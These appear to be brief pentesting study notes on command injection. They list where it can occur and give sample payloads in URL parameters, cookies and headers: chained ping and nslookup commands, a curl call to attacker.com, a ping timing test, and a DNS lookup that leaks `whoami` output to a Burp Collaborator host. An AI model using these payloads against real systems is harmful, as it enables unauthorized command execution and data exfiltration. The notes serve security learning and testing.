Command Injections

Can occur anywhere just like SQLI. Can occur in url parameters, form fields, http headers, cookies, referrer header, etc.

http://example.com/page.jsp?id=1; ping 10.11.122.34

Set-Cookies: sessionId=123; path=/; domain=example.com; & nslookup yfew.burpcollaborator.net

GET /index.jsp
Host: example.com
User-Agent: Mozilla/5.0 (WIndows NT 10.0; x64)
Referrer: http://example.com/page.jsp?id=1; curl http://attacker.com

Can also exist in submit feedback section, subscribe to newsletter, contact us, etc

mail -s "user feedback" -a From:user@example.com

using & ping -c5 127.0.0.1 & we can cause delay of 5 seconds so we can identify like this as well

& nslookup `whoami`.burpcollaborator.net

Last updated